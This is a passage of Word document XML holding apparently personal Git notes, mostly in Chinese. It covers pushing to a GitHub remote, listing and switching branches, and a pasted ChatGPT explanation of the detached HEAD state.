      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的远程名字的命令如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AB3900B" w14:textId="2C26D28D" w:rsidR="0026132D" w:rsidRPr="000F652B" w:rsidRDefault="0026132D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F652B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git remote add github https://github.com/SenRanja/licenseGenerator.git</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B39C8C0" w14:textId="34BDA415" w:rsidR="0026132D" w:rsidRPr="000F652B" w:rsidRDefault="0026132D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F652B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git branch -M master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7142A1" w14:textId="0A02DE8A" w:rsidR="00111450" w:rsidRDefault="00111450" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>（强行将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在所在分支，重命名为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> master</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C497F1B" w14:textId="76E698B5" w:rsidR="0026132D" w:rsidRPr="000F652B" w:rsidRDefault="00153748" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F652B">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git push -u github master</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FECE3EA" w14:textId="2D9E5B77" w:rsidR="00111450" w:rsidRDefault="00111450" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>（将本地的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>master</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分支代码提交到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> github</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的远程链接上）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E6D703" w14:textId="77777777" w:rsidR="0026132D" w:rsidRDefault="0026132D" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A72AE4A" w14:textId="77777777" w:rsidR="00970912" w:rsidRDefault="00970912" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75EBF279" w14:textId="77777777" w:rsidR="00970912" w:rsidRDefault="00970912" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09DD4C59" w14:textId="77777777" w:rsidR="00970912" w:rsidRDefault="00970912" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DCFC133" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="45" w:name="_Toc159779506"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看分支</w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
    </w:p>
    <w:p w14:paraId="5633A8ED" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看分支</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E47F6A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git branch #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>所有的分支</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F8CDE3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21FF6924" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看分支详细信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E713E3A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git branch -v #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列出本地所有的分支</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, + hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396D2118" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A9B7062" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看分支与远程的关联</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28333133" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git branch -vv #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列出本地所有的分支</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, + hash </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与远程的关联信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF343F3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6582939F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然默认本地和远程大部分都是同名的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是在多分支的场景下还是会出现不同名的情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D662C80" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过这个命令进行确认</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>非常好用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C6205D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52D45EE9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>查看所有分支</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3849E34B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A17523" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>git branch -a #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>列出所有的分支</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>远程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>和本地</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E177EBB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个命令在拉取别人的分支的时候非常有用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06659C8F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0333DE83" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git branch -a | grep xxx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EC02C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc159779507"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>切换分支</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="34339F88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>git checkout -b xxx origin/xxx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7BEBF7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728D2A8D" w14:textId="7DC0037F" w:rsidR="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Detached HEAD </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> checkout commit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后修改入新</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>branch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6A8613" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C"/>
    <w:p w14:paraId="5F8F171C" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C"/>
    <w:p w14:paraId="4432AF33" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:r w:rsidRPr="009C6E1C">
        <w:t>what is the meaning of detached HEAD states</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C739AFA" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A94487" w14:textId="337AE36D" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:r w:rsidRPr="009C6E1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ChatGPT said:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B6B3E7" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:r w:rsidRPr="009C6E1C">
        <w:t xml:space="preserve">In Git, a </w:t>
      </w:r>
      <w:r w:rsidRPr="009C6E1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>detached HEAD state</w:t>
      </w:r>
      <w:r w:rsidRPr="009C6E1C">
        <w:t xml:space="preserve"> occurs when you are working directly on a specific commit rather than on the latest commit of a branch. Understanding this concept is crucial for managing your work in Git, especially when exploring the history or making experimental changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01207BFD" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is the HEAD?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56414EEF" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HEAD</w:t>
      </w:r>
      <w:r w:rsidRPr="009C6E1C">
        <w:t xml:space="preserve"> is a pointer in Git that typically points to the latest commit on the current branch. It represents your current position in the repository's history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227DFF3E" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is a Detached HEAD State?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B5B95A" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:t>Normally, HEAD points to a branch, like main or feature-x. This means when you make new commits, those commits are added to the branch, and HEAD moves forward with the branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149484A5" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:t xml:space="preserve">In a </w:t>
      </w:r>
      <w:r w:rsidRPr="009C6E1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>detached HEAD state</w:t>
      </w:r>
      <w:r w:rsidRPr="009C6E1C">
        <w:t>, HEAD points directly to a specific commit rather than a branch. This can happen when you checkout a commit, a tag, or a remote branch directly, without creating a new branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B16457" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50633280" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:t>You have a branch main with a series of commits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08952AA0" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:t>If you checkout a commit in the middle of the history (e.g., git checkout &lt;commit-hash&gt;), you enter a detached HEAD state. Now, HEAD points to that specific commit, not to the main branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D90F299" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:t>This allows you to inspect, modify, or even create new commits from that specific point in history without affecting the main branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB7B372" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Implications of a Detached HEAD State:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6BEA6A" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Making Changes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0CC1B9" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:t>You can make changes and commit them while in a detached HEAD state. However, these commits are not connected to any branch. If you switch to another branch or commit without creating a new branch, you might lose these changes because they aren’t part of any branch’s history.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D708830" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312552D5" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:t>A detached HEAD is useful for exploring a project’s history, testing changes, or building a project from a specific commit or tag without modifying any branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE79476" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Creating a New Branch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72375FF6" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:t>If you want to keep your work, you can create a new branch from the detached HEAD state using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51694C30" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:r w:rsidRPr="009C6E1C">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9CB5F6" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:r w:rsidRPr="009C6E1C">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FD871E" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:r w:rsidRPr="009C6E1C">
        <w:lastRenderedPageBreak/>
        <w:t>git checkout -b new-branch-name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E356131" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:r w:rsidRPr="009C6E1C">
        <w:t>This will create a new branch that includes your recent commits, and HEAD will then point to this new branch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DE5FBC" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Undoing the Detached HEAD State:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0B54FC" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="44"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009C6E1C">
        <w:t>If you want to go back to a previous branch, you can simply checkout that branch:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C82F66" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:r w:rsidRPr="009C6E1C">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CF37FD" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:r w:rsidRPr="009C6E1C">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A3E03E" w14:textId="77777777" w:rsidR="009C6E1C" w:rsidRPr="009C6E1C" w:rsidRDefault="009C6E1C" w:rsidP="009C6E1C">
      <w:r w:rsidRPr="009C6E1C">
        <w:t>git checkout main</w:t>
